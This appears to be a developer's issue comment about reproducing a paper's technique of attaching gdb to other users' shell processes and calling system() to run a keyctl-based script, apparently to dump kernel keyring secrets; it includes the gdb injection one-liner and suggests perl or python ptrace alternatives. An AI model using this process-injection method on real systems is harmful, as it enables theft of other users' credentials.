X-C3LL
commented
3 years ago Hi!
In the original paper a .sh is provided ("Heracles.sh"). This .sh is called from each user session using GDB:
sudo gdb -p <shell_pid> -batch -ex 'call system("./heracles.sh")In reality, gdb is just using ptrace under the hood to attach to the process and do the magic. I don't know if there is a way to do it with pure bash... but as alternative you can build a one liner in perl and use the syscall function to call ptrace and add your call to system("/tmp/your-script-that-uses-keyctl) in any process. I guess python + ctypes would do the job too.
It is not pure bash... but is the closest thing you can do I guess.
I just noticed this exists in perl => https://metacpan.org/pod/Sys::Ptrace (but I am not sure if it is installed by default)
Need to dig into this to see what we can do from a shell script perspective. We'll continue to track the wider re-engineering under #6.